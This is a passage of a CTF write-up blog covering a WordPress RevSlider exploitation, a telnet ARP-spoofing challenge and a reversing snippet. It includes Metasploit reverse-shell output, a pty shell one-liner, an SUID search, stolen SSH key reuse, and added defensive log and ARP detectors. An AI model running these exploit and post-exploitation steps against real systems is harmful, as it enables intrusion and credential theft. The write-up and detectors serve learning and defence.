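# the Fqaa value is made up and is not the challenge flag
SAMPLE_SOURCE = (
    "# Embedded file name: reversing2.py\n"
    "from datetime import datetime\n"
    "Fqaa = " + as_list_literal("gigem{constructed_example}") + "\n"
    "XidT = " + as_list_literal("SuperSecretKey") + "\n"
    "\n"
    "def main():\n"
    "    print 'Clock.exe'\n"
    "    input = raw_input('>: ').strip()\n"
)

if __name__ == "__main__":
    for name, text in extract_int_lists(SAMPLE_SOURCE).items():
        print(name, "->", text)
```

Running the same function over the real reversing2.py output would print the secret key and the flag without ever executing the challenge code, which is also the safer habit when the binary is untrusted.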


1) Stop and Listen

Beginner pentest challenge.

  • Challenge

  • Start openVPN and listen to the traffic. Packets show the flag.

2) Wordpress

I liked this challenge a lot. Hacking by jumping across machines in the setup was very nice!

  • Challenge

  • Reconnaissance and Network Scanning or Mapping

  • WordPress Scan using wpscan
    • Results show that the revSlider plugin is vulnerable
    • The enumerate-usernames option reveals the admin
    • Brute-forcing the admin password did not work (tried different wordlists for admin)

  • Exploitation using Metasploit
    • Search for revslider plugin fetches the exploit
    • Use the exploit setting necessary options like the RHOST
    • Check if the target is vulnerable
    • Fire the exploit
    • Result: A meterpreter session (Shell) with www-data user is obtained
root@kali:~/Downloads# msfconsole
[-] No database definition for environment production
# cowsay++
< metasploit >
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.17.34-dev                         ]
+ -- --=[ 1845 exploits - 1045 auxiliary - 320 post       ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 
msf > 
msf > search revslider

Matching Modules

   Name                                             Disclosure Date  Rank       Check  Description
   ----                                             ---------------  ----       -----  -----------
   exploit/unix/webapp/wp_revslider_upload_execute  2014-11-26       excellent  Yes    WordPress RevSlider File Upload and Execute Vulnerability

msf > use exploit/unix/webapp/wp_revslider_upload_execute
msf exploit(unix/webapp/wp_revslider_upload_execute) > set RHOST
msf exploit(unix/webapp/wp_revslider_upload_execute) > exploit

[*] Started reverse TCP handler on 
[+] Our payload is at: /wp-content/plugins/revslider/temp/update_extract/revslider/QmcgmOG.php
[*] Calling payload...
[*] Sending stage (38247 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-03-01 13:19:30 -0800
[+] Deleted QmcgmOG.php
[+] Deleted ../revslider.zip

meterpreter > pwd
meterpreter > ls
No entries exist in /var/www/wp-content/plugins/revslider/temp/update_extract/revslider
  • Spawn tty shell
meterpreter > shell
Process 52 created.
Channel 2 created.
python -c 'import pty;pty.spawn("/bin/bash")'
  • Clearly the /root/flag.txt is under the control of root (www-data has no permission)

  • More Recon with the Machine

    • First interesting find is the wp-config (/var/www/), which contains the database credentials; used them to log in to MySQL and view the users table - admin password. (Here is the trick: the admin credentials need not be cracked, but I mistook this and took a diversion to crack the admin password.)
  • Some more information.

  • Note file content

  • system info

  • shell to dig into the machine

  • Process run by root shows sshd - < probably the key in the db server should help, as per note.txt? >
    www-data@apacheword:/dev$ ps aux
    ps aux
    root         1  0.0  0.0  17984  2872 ?        Ss   20:54   0:00 /bin/bash /star
    root        26  0.0  0.0  61392  3124 ?        Ss   20:54   0:00 /usr/sbin/sshd
    root        38  0.0  0.1 310992 24652 ?        S    20:54   0:00 apache2 -D FORE
    www-data    40  0.0  0.3 317804 48108 ?        S    20:54   0:00 apache2 -D FORE
    www-data    41  0.0  0.2 317832 44120 ?        S    20:54   0:00 apache2 -D FORE
    www-data    42  0.0  0.0 312720 14740 ?        S    20:54   0:00 apache2 -D FORE
    www-data    43  0.0  0.0 311016  7760 ?        S    20:54   0:00 apache2 -D FORE
  • Hacking MySQL server to read the local files.

TIP! –> It is annoying to copy the key data along with the table outline, so I added an extra step to not print the table outline, which makes copying the key easier.

  • Generate public key, Use the private key to perform SSH authentication as root.
* Add passphrase and change permission of the private key file
root@kali:~/Downloads# chmod 600 theKey.key 
root@kali:~/Downloads# sudo ssh-keygen -p -f theKey.key 
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 

* Wondered if we needed the public key, so generated it, but it should have already been added by root on the wordpress server.
root@kali:~/Downloads# sudo ssh-keygen -y -f theKey.key > theKey.pub
Enter passphrase: 
  • Flag

  • What did not work????
  - [This step is not needed] Also, the username/password logic is stored at --> ``; I took a detour to crack the admin password thinking it might help with privilege escalation, but I was wrong. Even then, I cracked the admin password by analyzing the code and reversing the hash

* Attempting Post Exploitation
  - Having obtained the shell already (even after looking at the note), I went crazy over some post-exploitation techniques.
  - Abuse kernel
    * Using kernel exploits, which were unsure
  - Abuse SUID
    * Try to abuse permissions in some manner: find / -xdev -perm 4000 -type f -print0 -exec ls -s {} \;
  - Abuse process migrate
    - with meterpreter migrate
  - Searching binary to exploit - searching for improper permission set in any binary.

* Attempting to hack into the mysql machine shell
  - Try to break the mysql shell with `!sh`
  - Try to run exploit. 
    - Found an exploit in MariaDB and MySQL 5.5 which I thought should work. Downloaded the exploit and tried exploiting, but it did not work. I ended up learning the MySQL version was updated to 5.6 and this was fixed...

[This step was not necessary for the challenge]

  • Hacking the Admin Account in Wordpress
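From the defender's side, the RevSlider step above leaves a clear trace: the Metasploit output shows the payload dropped under `/wp-content/plugins/revslider/temp/update_extract/` and then requested, and a web server should never be serving PHP out of that extraction directory. The following is an added example (not the writeup's code or Metasploit's) that scans Apache combined-format access logs for executed PHP under that path and counts prior POSTs to admin-ajax.php from the same client (the upload is assumed here to travel through admin-ajax.php). The log lines are constructed; the only real path in them is the one printed by msf above, and the client addresses are documentation ranges.

```python
"""Added example (not the writeup's own code): detect PHP being served from
RevSlider's temp extraction directory in Apache combined-format access logs.
SAMPLE_LOG is constructed; the revslider temp path matches the msf output."""
import re
from collections import defaultdict

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# PHP executed from the plugin's temp extraction directory: never legitimate
TEMP_PHP = re.compile(r"/wp-content/plugins/revslider/temp/update_extract/.*\.php", re.I)
# assumed upload channel for the plugin's update action
ADMIN_AJAX = re.compile(r"/wp-admin/admin-ajax\.php", re.I)


def parse(line: str):
    """Return the fields of one combined-format line, or None if it is not one."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def find_revslider_abuse(lines):
    """Return one alert per request for PHP under the temp extraction path,
    with a count of the same client's earlier POSTs to admin-ajax.php."""
    alerts = []
    ajax_posts = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if not rec:
            continue
        if rec["method"] == "POST" and ADMIN_AJAX.search(rec["path"]):
            ajax_posts[rec["ip"]] += 1
        if TEMP_PHP.search(rec["path"]):
            alerts.append({
                "ts": rec["ts"],
                "ip": rec["ip"],
                "path": rec["path"],
                "status": rec["status"],
                "prior_admin_ajax_posts": ajax_posts[rec["ip"]],
            })
    return alerts


# constructed Apache combined-format lines (203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges); the .php path is the one the msf run printed
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2019:13:19:28 -0800] "GET /wp-login.php HTTP/1.1" 200 2300 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2019:13:19:29 -0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Mar/2019:13:19:30 -0800] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/QmcgmOG.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Mar/2019:13:20:01 -0800] "GET /wp-content/plugins/revslider/public/assets/css/settings.css HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
    "garbage line that is not a log record",
]

if __name__ == "__main__":
    for a in find_revslider_abuse(SAMPLE_LOG):
        print("%(ts)s %(ip)s %(status)s %(path)s (prior admin-ajax POSTs: %(prior_admin_ajax_posts)d)" % a)
```

The same path rule works as a web-server configuration too: denying execution of `.php` under the plugin's `temp/` directory removes the execution step even if the upload succeeds, and keeping the plugin patched removes the upload.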

3) Calculator

Old school man in the middle for Telnet.

  • Challenge

  • Scanning or Recon

  • Setup
    • Monitor the interface in promiscuous or monitor mode to capture all the packets
    • To perform MITM
      • ARP spoof both machines
      • Enable IPv4 forwarding to route packets
  • Attack and Exploit - Using ArpSpoof in Kali

  • Notes with Alice's password. Use the initial control message exchange as a delimiter.

  • Flag –> Hidden file in the directory...!

  • Reference:
  • What was not required?
    • Running network interfaces in promiscuous mode, I wondered if I could just spoof the telnet client by acting as the server and send a forged packet to get the password. This was not reliable, but I just wondered initially…
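The ARP spoofing used in the setup above is also the easiest part of this attack to spot on the wire: a host suddenly answers for an IP address that was previously announced by a different MAC. The following is an added example (not the writeup's code or arpspoof's) of that detection logic. The ARP replies are constructed tuples rather than a real capture; a pcap reader such as scapy would supply the same four fields. Addresses are from the 192.0.2.0/24 documentation range.

```python
"""Added example (not the writeup's own code): flag ARP cache poisoning by
tracking which MAC claims each IP. SAMPLE_REPLIES is a constructed scenario."""
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "ts sender_ip sender_mac target_ip")


class ArpWatch:
    """Remember the first MAC seen for each IP; any later reply that claims the
    same IP from a different MAC is raised as an alert."""

    def __init__(self):
        self.table = {}     # ip -> first MAC that announced it
        self.alerts = []

    def observe(self, pkt: ArpReply):
        known = self.table.get(pkt.sender_ip)
        if known is None:
            self.table[pkt.sender_ip] = pkt.sender_mac
        elif known != pkt.sender_mac:
            self.alerts.append({
                "ts": pkt.ts,
                "ip": pkt.sender_ip,
                "was": known,
                "now": pkt.sender_mac,
                "sent_to": pkt.target_ip,
            })
        return self.alerts


def spoofed_ips(replies):
    """Return the set of IPs that were claimed by more than one MAC."""
    watch = ArpWatch()
    for pkt in replies:
        watch.observe(pkt)
    return {a["ip"] for a in watch.alerts}


# constructed scenario: the client (.10) and the telnet server (.20) exchange
# normal replies, then at t=5 a third host starts answering for both of them,
# which is what a two-sided ARP spoof looks like on the wire
CLIENT_MAC, SERVER_MAC, THIRD_MAC = "aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", "cc:cc:cc:cc:cc:cc"
SAMPLE_REPLIES = [
    ArpReply(1.0, "192.0.2.10", CLIENT_MAC, "192.0.2.20"),
    ArpReply(1.1, "192.0.2.20", SERVER_MAC, "192.0.2.10"),
    ArpReply(5.0, "192.0.2.20", THIRD_MAC, "192.0.2.10"),
    ArpReply(5.0, "192.0.2.10", THIRD_MAC, "192.0.2.20"),
    ArpReply(7.0, "192.0.2.20", THIRD_MAC, "192.0.2.10"),
]

if __name__ == "__main__":
    watch = ArpWatch()
    for pkt in SAMPLE_REPLIES:
        watch.observe(pkt)
    for a in watch.alerts:
        print("t=%(ts)s %(ip)s moved from %(was)s to %(now)s (reply sent to %(sent_to)s)" % a)
```

Static ARP entries for the two telnet endpoints would have stopped the poisoning outright, and replacing telnet with SSH would have left nothing readable even with the traffic redirected.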


  • Solved some challenges here –> assets will be updated soon


None yet, will update soon…